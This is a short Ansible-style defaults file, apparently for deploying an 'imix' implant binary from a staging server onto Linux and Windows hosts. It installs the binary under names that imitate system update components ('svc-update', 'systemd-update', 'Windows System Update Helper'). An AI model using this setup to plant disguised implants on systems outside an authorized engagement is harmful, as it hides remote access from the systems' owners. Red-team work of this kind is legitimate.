# Realm role defaults — override in group_vars/all.yml or at playbook level
realm_linux_binary_url: "http://{{ staging_ip }}:{{ staging_port }}/imix-linux"
realm_windows_binary_url: "http://{{ staging_ip }}:{{ staging_port }}/imix.exe"

realm_linux_bin_path:     "/usr/local/bin/svc-update"
realm_windows_bin_path:   'C:\Windows\System32\svc-update.exe'

realm_linux_service_name:   "systemd-update"
realm_windows_task_name:    "Windows System Update Helper"
realm_windows_process_name: "svc-update"
